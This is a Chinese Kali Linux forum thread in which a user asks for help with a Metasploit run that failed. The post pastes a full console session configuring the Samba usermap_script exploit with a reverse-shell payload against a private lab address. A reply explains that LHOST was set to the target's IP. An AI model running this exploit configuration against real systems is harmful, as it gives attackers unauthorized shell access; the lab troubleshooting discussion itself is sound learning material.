Kali 中文网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

搜索
查看: 430|回复: 2

[求助] Metasploit渗透目标机器时提示:No session was created

[复制链接]
发表于 2019-5-31 17:59:57 | 显示全部楼层 |阅读模式
报错具体如下,请大神赐教,老夫在此跪谢!
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set TARGET 0
TARGET => 0
msf5 exploit(multi/samba/usermap_script) > set SMBName *SMBSERVER
SMBName => *SMBSERVER
msf5 exploit(multi/samba/usermap_script) > set NTLM::UseLMKey false
NTLM::UseLMKey => false
msf5 exploit(multi/samba/usermap_script) > set SMBUser
SMBUser =>
msf5 exploit(multi/samba/usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set SSLVersion Auto
SSLVersion => Auto
msf5 exploit(multi/samba/usermap_script) > set TCP::send_delay 0
TCP::send_delay => 0
msf5 exploit(multi/samba/usermap_script) > set SMB::Native_LM Windows 2000 5.0
SMB::Native_LM => Windows 2000 5.0
msf5 exploit(multi/samba/usermap_script) > set SMBPass
SMBPass =>
msf5 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf5 exploit(multi/samba/usermap_script) > set NTLM::SendLM true
NTLM::SendLM => true
msf5 exploit(multi/samba/usermap_script) > set SMB::pipe_write_min_size 1
SMB::pipe_write_min_size => 1
msf5 exploit(multi/samba/usermap_script) > set SMBDomain .
SMBDomain => .
msf5 exploit(multi/samba/usermap_script) > set WfsDelay 0
WfsDelay => 0
msf5 exploit(multi/samba/usermap_script) > set NTLM::UseNTLM2_session true
NTLM::UseNTLM2_session => true
msf5 exploit(multi/samba/usermap_script) > set SMB::pad_file_level 0
SMB::pad_file_level => 0
msf5 exploit(multi/samba/usermap_script) > set NTLM::SendNTLM true
NTLM::SendNTLM => true
msf5 exploit(multi/samba/usermap_script) > set LPORT 27839
LPORT => 27839
msf5 exploit(multi/samba/usermap_script) > set VERBOSE false
VERBOSE => false
msf5 exploit(multi/samba/usermap_script) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf5 exploit(multi/samba/usermap_script) > set TCP::max_send_size 0
TCP::max_send_size => 0
msf5 exploit(multi/samba/usermap_script) > set ConnectTimeout 10
ConnectTimeout => 10
msf5 exploit(multi/samba/usermap_script) > set SMB::pipe_write_max_size 1024
SMB::pipe_write_max_size => 1024
msf5 exploit(multi/samba/usermap_script) > set LHOST 192.168.56.102
LHOST => 192.168.56.102
msf5 exploit(multi/samba/usermap_script) > set SMB::ChunkSize 500
SMB::ChunkSize => 500
msf5 exploit(multi/samba/usermap_script) > set SMB::obscure_trans_pipe_level 0
SMB::obscure_trans_pipe_level => 0
msf5 exploit(multi/samba/usermap_script) > set SSL false
SSL => false
msf5 exploit(multi/samba/usermap_script) > set SMB::Native_OS Windows 2000 2195
SMB::Native_OS => Windows 2000 2195
msf5 exploit(multi/samba/usermap_script) > set NTLM::SendSPN true
NTLM::SendSPN => true
msf5 exploit(multi/samba/usermap_script) > set SMB::pipe_read_max_size 1024
SMB::pipe_read_max_size => 1024
msf5 exploit(multi/samba/usermap_script) > set EnableContextEncoding false
EnableContextEncoding => false
msf5 exploit(multi/samba/usermap_script) > set SMB::VerifySignature false
SMB::VerifySignature => false
msf5 exploit(multi/samba/usermap_script) > set RPORT 139
RPORT => 139
msf5 exploit(multi/samba/usermap_script) > set SMB::pipe_evasion false
SMB::pipe_evasion => false
msf5 exploit(multi/samba/usermap_script) > set SSLVerifyMode PEER
SSLVerifyMode => PEER
msf5 exploit(multi/samba/usermap_script) > set SMBDirect true
SMBDirect => true
msf5 exploit(multi/samba/usermap_script) > set SMB::pipe_read_min_size 1
SMB::pipe_read_min_size => 1
msf5 exploit(multi/samba/usermap_script) > set SMB::pad_data_level 0
SMB::pad_data_level => 0
msf5 exploit(multi/samba/usermap_script) > set NTLM::UseNTLMv2 true
NTLM::UseNTLMv2 => true
msf5 exploit(multi/samba/usermap_script) > exploit -j
  • Exploit running as background job 1.
  • Exploit completed, but no session was created.
    [-] Handler failed to bind to 192.168.56.102:27839:-  -
  • Started reverse TCP double handler on 0.0.0.0:27839



  • +1
    432°C
    2
    • 大学霸__IT达人
    • simonliu988
    过: 他们
    发表于 2019-6-4 09:00:25 | 显示全部楼层
    -] Handler failed to bind to 192.168.56.102:27839:-

    绑定失败。检查这个IP地址是不是你Kali的地址。如果是,该端口是不是被占用了。
    回复 支持 反对

    使用道具 举报

    发表于 3 天前 | 显示全部楼层
    谢谢分享,学习。。。。。。。。。。。。。。。。。。。。。。。。。。。。
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    Kali linux ( 蜀ICP备10027298号-4 ) Topics |


    免责声明:
    Kali linux中文网所发布的一切教程文章仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。

    GMT+8, 2019-6-26 23:51 , Processed in 0.133654 second(s), 21 queries , Gzip On.

    Powered by Discuz!

    © 2009-2016 KALI

    快速回复 返回顶部 返回列表